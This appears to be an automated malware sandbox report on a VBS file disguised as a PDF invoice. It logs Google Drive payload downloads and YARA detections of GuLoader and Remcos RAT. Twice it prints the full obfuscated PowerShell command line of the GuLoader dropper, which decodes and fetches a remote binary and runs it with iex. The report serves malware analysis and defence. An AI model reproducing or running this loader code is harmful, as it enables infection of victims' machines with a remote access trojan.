                                      X-GUploader-UploadID: AD-8ljuJrbJ-a1KyGRe8aURo6DB85xJhcnaPGo9ac7osHG8Ze5x_iiKC3LL-Oxokqe4N4eo4Xw
                                      Date: Tue, 01 Oct 2024 05:46:46 GMT
                                      Expires: Tue, 01 Oct 2024 05:46:46 GMT
                                      Cache-Control: private, max-age=0
                                      X-Goog-Hash: crc32c=2nTycA==
                                      Server: UploadServer
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      2 | 192.168.2.9 | 49709 | 216.58.206.78 | 443 | 7400 | C:\Windows\SysWOW64\msiexec.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-10-01 05:47:18 UTC | 216 | OUT | GET /uc?export=download&id=16BcB-CnWtRtHDq7UA6aD9a4cHD2R7_Ck HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: drive.google.com
                                      Cache-Control: no-cache
                                      2024-10-01 05:47:18 UTC | 1610 | IN | HTTP/1.1 303 See Other
                                      Content-Type: application/binary
                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                      Pragma: no-cache
                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                      Date: Tue, 01 Oct 2024 05:47:18 GMT
                                      Location: https://drive.usercontent.google.com/download?id=16BcB-CnWtRtHDq7UA6aD9a4cHD2R7_Ck&export=download
                                      Strict-Transport-Security: max-age=31536000
                                      Cross-Origin-Opener-Policy: same-origin
                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                      Content-Security-Policy: script-src 'nonce-0jawIWtBlPcNmtC7fhTatA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                      Server: ESF
                                      Content-Length: 0
                                      X-XSS-Protection: 0
                                      X-Frame-Options: SAMEORIGIN
                                      X-Content-Type-Options: nosniff
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      3 | 192.168.2.9 | 49710 | 142.250.185.97 | 443 | 7400 | C:\Windows\SysWOW64\msiexec.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-10-01 05:47:19 UTC | 258 | OUT | GET /download?id=16BcB-CnWtRtHDq7UA6aD9a4cHD2R7_Ck&export=download HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Cache-Control: no-cache
                                      Host: drive.usercontent.google.com
                                      Connection: Keep-Alive
                                      2024-10-01 05:47:22 UTC | 4854 | IN | HTTP/1.1 200 OK
                                      Content-Type: application/octet-stream
                                      Content-Security-Policy: sandbox
                                      Content-Security-Policy: default-src 'none'
                                      Content-Security-Policy: frame-ancestors 'none'
                                      X-Content-Security-Policy: sandbox
                                      Cross-Origin-Opener-Policy: same-origin
                                      Cross-Origin-Embedder-Policy: require-corp
                                      Cross-Origin-Resource-Policy: same-site
                                      X-Content-Type-Options: nosniff
                                      Content-Disposition: attachment; filename="mXqUFRV143.bin"
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Credentials: false
                                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                      Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                      Accept-Ranges: bytes
                                      Content-Length: 494656
                                      Last-Modified: Mon, 30 Sep 2024 07:22:51 GMT
                                      X-GUploader-UploadID: AD-8ljunxwz52Xl0P2kDsknMUTRtBw4_OfWnClxS_ZJ1GEZ5yGCz6QHwDRr5_mAIFaqAmm3yDZxquzr-OQ
                                      Date: Tue, 01 Oct 2024 05:47:22 GMT
                                      Expires: Tue, 01 Oct 2024 05:47:22 GMT
                                      Cache-Control: private, max-age=0
                                      X-Goog-Hash: crc32c=7ODCIg==
                                      Server: UploadServer
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close


                                      Target ID:0
                                      Start time:01:46:36
                                      Start date:01/10/2024
                                      Path:C:\Windows\System32\wscript.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\18000012550_20240930_0078864246#U00b7pdf.vbs"
                                      Imagebase:0x7ff78a430000
                                      File size:170'496 bytes
                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:2
                                      Start time:01:46:39
                                      Start date:01/10/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Akaniaceae Herefords Skifertavles #>;$Tennisalbue='Landgrnse';<#tallerkenret Gravkers Bandonion #>;$Unvicarious156=$host.PrivateData;If ($Unvicarious156) {$Sanitetsartikel++;}function Rundholts($Affectationist){$Blasfemiernes=$Hittebarnets+$Affectationist.Length-$Sanitetsartikel;for( $Fastendes=5;$Fastendes -lt $Blasfemiernes;$Fastendes+=6){$Composersatserne+=$Affectationist[$Fastendes];}$Composersatserne;}function Katedres($threadlike){ . ($Absoluthed) ($threadlike);}$Oxyhemocyanin=Rundholts 'Pa opMRach oBarnez ormi Con lPtolel SyntaCompo/Nonse5 Rheo.Netw 0 Opsi Tvanm(,lyveWUnembib,eotn PasadPostcoOu,dew Unars Dagb MussoNDvaleTNymp. Spros1Alp n0A ton.Ji ga0Runds; Myel LandiWMalniiL thonUnmud6Pr,se4 Spek;Tilba UdloexSyste6 anne4Ignor; Unig RejmrGoalpv awki: arto1Maale2dogto1Pupil.Outbl0Sem h)Sl,ms Shr wGBredleNdhavcd uidk runco,aser/P.wer2Cenes0Milje1Talle0Sikke0 Dybt1Over 0 brun1Mi ia nonreFServiiTomborUf gleudsmyfTormeo BathxSamle/Gdann1Till 2Blemi1Stipe.Bookn0Sgete ';$Paahngsmotors=Rundholts 'Ci.aruTrv eSR.cereApostr.amme-EvaluaVoka g TurgEPerboNRedisTPhyto ';$Sympatisrers=Rundholts 'AboithUdp,ntSmaratXanthpfuldbsG dro:P aco/sc ot/Besind uachrHvidei OpulvNo pheAflas.Hy,ergInforo HurkoStoregLabill bilre s lv.Pteroc RytmoPiddlm Bi l/Sporvu AnaccIndre?DataoeSti fxmaterp Yde oOpgavrFalsktSwap = lyndPlasho SupewR.petnGrofelTj lko EcodaSkriddAmuei&.orsgiK ssedR sso= Inde1Inse 6u,stoKSubbrU Ha,pqS.rimagloosQRegel_GenneXsuper6Lodgiz S,urb ysfuB ImpuHMu,tiAConteGV nstN I manKredis Stude Da.awurdypu B les.ilatwForedUBawdsAVerbaZHjttax Kloat Pr.cxSolodG Ballv Fags7 Papn ';$afrimninger=Rundholts ' dies> Iamb ';$Absoluthed=Rundholts 'IndadiRekruEDissex Gyro ';$Fastendesnconsultable='Misappropriating';$Newfangle='\Forsvarsministers.Sca';Katedres (Rundholts 'Rbest$TienngLetmelKonomo ubcubTrommaSlugglGaade:OvermMJewbiiEarlilSdmeflTr,ppiGrilloLodren 
fmateBysterPrivi=Toupe$ AsseeRotatnTrustvHelv :FasefaHoa.cp .apip diurdStaala.alketDietha Manu+Datak$H terNOutbleUd,paw dis.f Scamast genRep.igLse.al Crabe Prel ');Katedres (Rundholts 'Grnse$Sinu gS.blel.estaoSamarbRefuea Min lSema.:Va.soPStro aSkalklTechnaSkrabvAtomveRigsgrGal.eeRema,sBi al=Hornb$IriziSTestiyReim,mUnm sp oddvave,rttSociaiUnsubs Indlr UdbreErfarrFolkesAlter.Shrins Ag.rpBild,lBrugsi Fllet Gge (Hjemk$ SperaPuslifInt rr SprgiEn.anmHusbenFatheiRicarnSkandg shareSt,icrOverr)Di mi ');Katedres (Rundholts 'Kn wf[ForthN Sygee o tptDisbu.MetalS SkriesmartrJalo,vTiptiiHarpwc Vikte,welfPDermaoTidsbi MalcnMonotttrollM F,aaa Shign Ste aFllesgUdvaneNivelr Sawe]Tkked: Molm:Trak,SUnseneForincKissiuRefelrLustri Artht Noncy RustPTankvrBogstoBo ettArrecoNonh cIsfl.oVraiclPhyl Ch ff=Preco Apath[AnmelNYdedeeOdysstSynus.BesnaSAcclaeAlbsrcSidesuCircur hotoiA.sistTvangyUdmunPStaderHo lioGeno,t F,sioKo,doct.lesoHybrilIndbiTNormay TranpLondoeSwitc]kinet:Rimes: UnreT ancl impesRoolu1Vault2 ,kri ');$Sympatisrers=$Palaveres[0];$Dodrantal110=(Rundholts ' Th,r$ThewigOphrsLAce oO GelnB Ju eaTpp flHe.lg: lkniHA lerO BencBCompon S msAAlbueIdetaiLUetabeEnigmR Omla=SpindN Fje eDupliWNumme- rescORuslab Idryj k reESapo CN.nphtBaand StenbSScr wYWoofsSHurryTAfte EvidenMFrodi.ba.leNOpti EHyperTUncan.U dslwBudgeeArchpbskannCTurd LAfsati Rhi,eKlorenPan eTMades ');Katedres ($Dodrantal110);Katedres (Rundholts 'Hypsf$ F,uaHChinco Ree bFormon MousaOptraiEntr,lTekste R.dir Y ed.SkaebH skydefindeaPastedHomoleTrumfr S,uls vows[Produ$ lutcPTermoa LiotaFlygthChecknFurn.gM skes.omefmSkyl o BandtSit moBeclarKipkas Enst] oida=Hepta$ Fo tOL mpwxCardiySalfehBlodge PraemHospioReguicInterySideoasexa nPanteiTurginqua r ');$Verdensanskuelser=Rundholts ' yros$TilbyHQuagmoDemo.bThwa nAsparaBedspi RheulIrr peSlalorFi ke.VersaDAnt co Rigew onfln Ophelencyko A,ndaReco dTopplFOptjei midtlLosseePatri(Reakt$vrdirSPrislyadenomObs epYdelsaEddert Datai EnebsDipsorEnligeRdgrarhyp osKosmo,Favou$sangrUFag nn ,ornl 
KiwaiSkannnAthe kPh lai FornnKul,kgRussi)Sp ed ';$Unlinking=$Millioner;Katedres (Rundholts 'Svare$Bill gnittalBrodeoPrecaBC phaATidsflstrow: b neAPremirBlethbU.dtroBredbrSkride Til TlektieZ lottTr cuSSnadr= ovn( UltrtUnexpeDai iSLorest,ppen- Urbap MiljaSkinnTTonguhDogca Avis$ EnspuImmornAdvislArm,tiDistnnS ckek Be tiP.opan itrigRundk)dagli ');while (!$Arboretets) {Katedres (Rundholts ',irpa$Slavog.ilkal Af ioChiefbLampeaOv rfl Erhv: MgledSk leiChitosMastipO ermabi,abt Justr,lguiiValfaaProbltTelefeStrindSlavi=Amt v$ onpatBabblr eneuTheateFae,a ') ;Katedres $Verdensanskuelser;Katedres (Rundholts 'AlmicSBestetKarabaKong rUnhy,tBanta-Di.gnSUnderlVinkee PredeGranipDisre Salig4.erho ');Katedres (Rundholts 'Deakt$Kutc,gSter,lfor aoParbobNudapaErhvelUnder: ScioA OsterLa,neb nsupo yranrJournePhanetgradie DanstArrigsTymon=Gildn(TrickTDesseeUud.os SkydtA lin-SpndvP TaagaS vertPaas hDuche Expel$RisenU AnkynEberulOrdeniVide,nMorgekFag,riRea snCar,ig.esti)Tellu ') ;Katedres (Rundholts ' Spil$Bhilig B yalm wkioMangabVisagaantimlK lif:BefelkFo.lei resblSvineoPickfmDwineeO eratNe vreAandsrLagrivMo,uliDega,sAntis=Om ld$In ongUndeflMusikoPreunbSamenaProdul Deuc:ProclM PolyiRempld ultedDilaneT.mmel OpbymUsselaOvertnSpe.idSc ig+Curba+ Ski,%Halvt$Sozz PTremoa Cif l CoupaFl esvOutcoeStemprBetone Apots .aks.Taks,cAfdano E bsuBa tin U.plt.opul ') ;$Sympatisrers=$Palaveres[$kilometervis];}$Suffragette=325927;$Fljl=31238;Katedres (Rundholts 'Ox.ge$ Demeg Infil Dis o be,obAm ioa Ta klAfsag:OppebT K lli polyl K.lbbD,stiaSkattgF naleOms yvAzurmiPietes.rihanVivi i iskenKlv dgP.rafeS,raar GhernFir,te Edmo Nylgh=Penta iveaG FlneeAfdelt.stig- HaloCNegatoSk slnTsni t PrepeSnyltnArchctSup r P ppi$E.traUBajonnfeltblC mosiInfornSlokekFuldbiUddannR incgAsymp ');Katedres (Rundholts 'Sniff$bredbgUndimlGeniooEpidob DommaInspilFa,rn:Ann.kSMa,prmUvor o Photk eonaeLattesSklms Fasc,=cater Vandc[TaxieS B,okyAccoysad.entDec.leFagtimMoile.KolleCDiscio Spi.nFred,v Omskeun.iprStilltGalni]Prefe:H sto: tmosF 
P,werG,easo.rescm Fru Bh.lpeaSona,s raneOvers6 Slid4NiterS,onglt Sub r.bdomiDeorinAandsgF,rst(Drues$Re,atTHj.ali TurdlSiderbMolaraProskgFodrseWhilev engeiSkabesDiartn ddb i Boo.n Udtrg Fde eRegnerTeg,snConv ePu ss) Kono ');Katedres (Rundholts 'Blres$ KommgW erel gentoChorob Gymna EskilGige :HominP ReceaBialotUnderrV detoTekstnAcroliNonrhsVel teUri.a ,igeo=Exces Stipu[midcaSsacchyFejlasGernetCoprieRegnsm In.i.angreTReforeendetxAngivtVange.,dvanEEngronRec vc onacoPolitd Scoui KybenCoppegDaaer]P ner:Tr ld:,eogaA ambeSRecomCS,davIStyr.IAteli.l vvaG ,radeHelodtAbe rS ajbat idsbrFlskeiUdstynA.bejg Para(Fluev$jubilSBerm.mMili o IdrtkForsteguds.s Fuel)Tyson ');Katedres (Rundholts 'Amtsr$Ge ekg TilblmooleoDybfrbUreidaKlepplVinbj:nonarJBone,oDiss.m FrafsAd.irvLndstiAdsb kCykeli Crann spirgbrido=Armkr$Si.yfP sti a synctSluknrTypomoPre rnInteriUnsnosaccoueEvaku.HypersEflaguTritibMidtps AbdatSelskr de miAgglunKaryagTyra (Sprjt$ Arb SClamwuTra.tfRe.apfNudisrUforsaFlon.gHyd,oe Fibrt Cojot oxieosma ,Thora$ejendFNyetalFejlkj andulMlkeg) Prot ');Katedres $Jomsviking;"
                                      Imagebase:0x7ff760310000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.1533232702.00000291902A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:true

                                      Target ID:3
                                      Start time:01:46:39
                                      Start date:01/10/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff70f010000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:4
                                      Start time:01:46:50
                                      Start date:01/10/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Akaniaceae Herefords Skifertavles #>;$Tennisalbue='Landgrnse';<#tallerkenret Gravkers Bandonion #>;$Unvicarious156=$host.PrivateData;If ($Unvicarious156) {$Sanitetsartikel++;}function Rundholts($Affectationist){$Blasfemiernes=$Hittebarnets+$Affectationist.Length-$Sanitetsartikel;for( $Fastendes=5;$Fastendes -lt $Blasfemiernes;$Fastendes+=6){$Composersatserne+=$Affectationist[$Fastendes];}$Composersatserne;}function Katedres($threadlike){ . ($Absoluthed) ($threadlike);}$Oxyhemocyanin=Rundholts 'Pa opMRach oBarnez ormi Con lPtolel SyntaCompo/Nonse5 Rheo.Netw 0 Opsi Tvanm(,lyveWUnembib,eotn PasadPostcoOu,dew Unars Dagb MussoNDvaleTNymp. Spros1Alp n0A ton.Ji ga0Runds; Myel LandiWMalniiL thonUnmud6Pr,se4 Spek;Tilba UdloexSyste6 anne4Ignor; Unig RejmrGoalpv awki: arto1Maale2dogto1Pupil.Outbl0Sem h)Sl,ms Shr wGBredleNdhavcd uidk runco,aser/P.wer2Cenes0Milje1Talle0Sikke0 Dybt1Over 0 brun1Mi ia nonreFServiiTomborUf gleudsmyfTormeo BathxSamle/Gdann1Till 2Blemi1Stipe.Bookn0Sgete ';$Paahngsmotors=Rundholts 'Ci.aruTrv eSR.cereApostr.amme-EvaluaVoka g TurgEPerboNRedisTPhyto ';$Sympatisrers=Rundholts 'AboithUdp,ntSmaratXanthpfuldbsG dro:P aco/sc ot/Besind uachrHvidei OpulvNo pheAflas.Hy,ergInforo HurkoStoregLabill bilre s lv.Pteroc RytmoPiddlm Bi l/Sporvu AnaccIndre?DataoeSti fxmaterp Yde oOpgavrFalsktSwap = lyndPlasho SupewR.petnGrofelTj lko EcodaSkriddAmuei&.orsgiK ssedR sso= Inde1Inse 6u,stoKSubbrU Ha,pqS.rimagloosQRegel_GenneXsuper6Lodgiz S,urb ysfuB ImpuHMu,tiAConteGV nstN I manKredis Stude Da.awurdypu B les.ilatwForedUBawdsAVerbaZHjttax Kloat Pr.cxSolodG Ballv Fags7 Papn ';$afrimninger=Rundholts ' dies> Iamb ';$Absoluthed=Rundholts 'IndadiRekruEDissex Gyro ';$Fastendesnconsultable='Misappropriating';$Newfangle='\Forsvarsministers.Sca';Katedres (Rundholts 'Rbest$TienngLetmelKonomo ubcubTrommaSlugglGaade:OvermMJewbiiEarlilSdmeflTr,ppiGrilloLodren 
fmateBysterPrivi=Toupe$ AsseeRotatnTrustvHelv :FasefaHoa.cp .apip diurdStaala.alketDietha Manu+Datak$H terNOutbleUd,paw dis.f Scamast genRep.igLse.al Crabe Prel ');Katedres (Rundholts 'Grnse$Sinu gS.blel.estaoSamarbRefuea Min lSema.:Va.soPStro aSkalklTechnaSkrabvAtomveRigsgrGal.eeRema,sBi al=Hornb$IriziSTestiyReim,mUnm sp oddvave,rttSociaiUnsubs Indlr UdbreErfarrFolkesAlter.Shrins Ag.rpBild,lBrugsi Fllet Gge (Hjemk$ SperaPuslifInt rr SprgiEn.anmHusbenFatheiRicarnSkandg shareSt,icrOverr)Di mi ');Katedres (Rundholts 'Kn wf[ForthN Sygee o tptDisbu.MetalS SkriesmartrJalo,vTiptiiHarpwc Vikte,welfPDermaoTidsbi MalcnMonotttrollM F,aaa Shign Ste aFllesgUdvaneNivelr Sawe]Tkked: Molm:Trak,SUnseneForincKissiuRefelrLustri Artht Noncy RustPTankvrBogstoBo ettArrecoNonh cIsfl.oVraiclPhyl Ch ff=Preco Apath[AnmelNYdedeeOdysstSynus.BesnaSAcclaeAlbsrcSidesuCircur hotoiA.sistTvangyUdmunPStaderHo lioGeno,t F,sioKo,doct.lesoHybrilIndbiTNormay TranpLondoeSwitc]kinet:Rimes: UnreT ancl impesRoolu1Vault2 ,kri ');$Sympatisrers=$Palaveres[0];$Dodrantal110=(Rundholts ' Th,r$ThewigOphrsLAce oO GelnB Ju eaTpp flHe.lg: lkniHA lerO BencBCompon S msAAlbueIdetaiLUetabeEnigmR Omla=SpindN Fje eDupliWNumme- rescORuslab Idryj k reESapo CN.nphtBaand StenbSScr wYWoofsSHurryTAfte EvidenMFrodi.ba.leNOpti EHyperTUncan.U dslwBudgeeArchpbskannCTurd LAfsati Rhi,eKlorenPan eTMades ');Katedres ($Dodrantal110);Katedres (Rundholts 'Hypsf$ F,uaHChinco Ree bFormon MousaOptraiEntr,lTekste R.dir Y ed.SkaebH skydefindeaPastedHomoleTrumfr S,uls vows[Produ$ lutcPTermoa LiotaFlygthChecknFurn.gM skes.omefmSkyl o BandtSit moBeclarKipkas Enst] oida=Hepta$ Fo tOL mpwxCardiySalfehBlodge PraemHospioReguicInterySideoasexa nPanteiTurginqua r ');$Verdensanskuelser=Rundholts ' yros$TilbyHQuagmoDemo.bThwa nAsparaBedspi RheulIrr peSlalorFi ke.VersaDAnt co Rigew onfln Ophelencyko A,ndaReco dTopplFOptjei midtlLosseePatri(Reakt$vrdirSPrislyadenomObs epYdelsaEddert Datai EnebsDipsorEnligeRdgrarhyp osKosmo,Favou$sangrUFag nn ,ornl 
KiwaiSkannnAthe kPh lai FornnKul,kgRussi)Sp ed ';$Unlinking=$Millioner;Katedres (Rundholts 'Svare$Bill gnittalBrodeoPrecaBC phaATidsflstrow: b neAPremirBlethbU.dtroBredbrSkride Til TlektieZ lottTr cuSSnadr= ovn( UltrtUnexpeDai iSLorest,ppen- Urbap MiljaSkinnTTonguhDogca Avis$ EnspuImmornAdvislArm,tiDistnnS ckek Be tiP.opan itrigRundk)dagli ');while (!$Arboretets) {Katedres (Rundholts ',irpa$Slavog.ilkal Af ioChiefbLampeaOv rfl Erhv: MgledSk leiChitosMastipO ermabi,abt Justr,lguiiValfaaProbltTelefeStrindSlavi=Amt v$ onpatBabblr eneuTheateFae,a ') ;Katedres $Verdensanskuelser;Katedres (Rundholts 'AlmicSBestetKarabaKong rUnhy,tBanta-Di.gnSUnderlVinkee PredeGranipDisre Salig4.erho ');Katedres (Rundholts 'Deakt$Kutc,gSter,lfor aoParbobNudapaErhvelUnder: ScioA OsterLa,neb nsupo yranrJournePhanetgradie DanstArrigsTymon=Gildn(TrickTDesseeUud.os SkydtA lin-SpndvP TaagaS vertPaas hDuche Expel$RisenU AnkynEberulOrdeniVide,nMorgekFag,riRea snCar,ig.esti)Tellu ') ;Katedres (Rundholts ' Spil$Bhilig B yalm wkioMangabVisagaantimlK lif:BefelkFo.lei resblSvineoPickfmDwineeO eratNe vreAandsrLagrivMo,uliDega,sAntis=Om ld$In ongUndeflMusikoPreunbSamenaProdul Deuc:ProclM PolyiRempld ultedDilaneT.mmel OpbymUsselaOvertnSpe.idSc ig+Curba+ Ski,%Halvt$Sozz PTremoa Cif l CoupaFl esvOutcoeStemprBetone Apots .aks.Taks,cAfdano E bsuBa tin U.plt.opul ') ;$Sympatisrers=$Palaveres[$kilometervis];}$Suffragette=325927;$Fljl=31238;Katedres (Rundholts 'Ox.ge$ Demeg Infil Dis o be,obAm ioa Ta klAfsag:OppebT K lli polyl K.lbbD,stiaSkattgF naleOms yvAzurmiPietes.rihanVivi i iskenKlv dgP.rafeS,raar GhernFir,te Edmo Nylgh=Penta iveaG FlneeAfdelt.stig- HaloCNegatoSk slnTsni t PrepeSnyltnArchctSup r P ppi$E.traUBajonnfeltblC mosiInfornSlokekFuldbiUddannR incgAsymp ');Katedres (Rundholts 'Sniff$bredbgUndimlGeniooEpidob DommaInspilFa,rn:Ann.kSMa,prmUvor o Photk eonaeLattesSklms Fasc,=cater Vandc[TaxieS B,okyAccoysad.entDec.leFagtimMoile.KolleCDiscio Spi.nFred,v Omskeun.iprStilltGalni]Prefe:H sto: tmosF 
P,werG,easo.rescm Fru Bh.lpeaSona,s raneOvers6 Slid4NiterS,onglt Sub r.bdomiDeorinAandsgF,rst(Drues$Re,atTHj.ali TurdlSiderbMolaraProskgFodrseWhilev engeiSkabesDiartn ddb i Boo.n Udtrg Fde eRegnerTeg,snConv ePu ss) Kono ');Katedres (Rundholts 'Blres$ KommgW erel gentoChorob Gymna EskilGige :HominP ReceaBialotUnderrV detoTekstnAcroliNonrhsVel teUri.a ,igeo=Exces Stipu[midcaSsacchyFejlasGernetCoprieRegnsm In.i.angreTReforeendetxAngivtVange.,dvanEEngronRec vc onacoPolitd Scoui KybenCoppegDaaer]P ner:Tr ld:,eogaA ambeSRecomCS,davIStyr.IAteli.l vvaG ,radeHelodtAbe rS ajbat idsbrFlskeiUdstynA.bejg Para(Fluev$jubilSBerm.mMili o IdrtkForsteguds.s Fuel)Tyson ');Katedres (Rundholts 'Amtsr$Ge ekg TilblmooleoDybfrbUreidaKlepplVinbj:nonarJBone,oDiss.m FrafsAd.irvLndstiAdsb kCykeli Crann spirgbrido=Armkr$Si.yfP sti a synctSluknrTypomoPre rnInteriUnsnosaccoueEvaku.HypersEflaguTritibMidtps AbdatSelskr de miAgglunKaryagTyra (Sprjt$ Arb SClamwuTra.tfRe.apfNudisrUforsaFlon.gHyd,oe Fibrt Cojot oxieosma ,Thora$ejendFNyetalFejlkj andulMlkeg) Prot ');Katedres $Jomsviking;"
                                      Imagebase:0xa00000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.1849801435.0000000008250000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.1850125168.000000000B27C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.1830090087.00000000054F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:true

                                      Target ID:5
                                      Start time:01:46:51
                                      Start date:01/10/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff70f010000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:7
                                      Start time:01:47:08
                                      Start date:01/10/2024
                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\syswow64\msiexec.exe"
                                      Imagebase:0x80000
                                      File size:59'904 bytes
                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:true

                                      Target ID:12
                                      Start time:01:47:23
                                      Start date:01/10/2024
                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                      Imagebase:0x80000
                                      File size:59'904 bytes
                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                        • Instruction Fuzzy Hash: 6361E421A0EBC54FE7929B6858556A57FE0FF56250B0801FBD04DCB1A3DA1DAC0AC392
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1548690105.00007FF886D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff886d20000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dfd1d80183fa1676fb90d091df05a11d8985c61bd9b0c4868b7203aad41834dd
                                        • Instruction ID: 21d605bef87fa1a65169ba2e28fb50a3cea52087e03490e630988ee0c1d28614
                                        • Opcode Fuzzy Hash: dfd1d80183fa1676fb90d091df05a11d8985c61bd9b0c4868b7203aad41834dd
                                        • Instruction Fuzzy Hash: FB511521A0DA864FE7B6D76844916B47BE2FF56360B1801FAC14ECF2D7D90DAC45C382
                                        Memory Dump Source
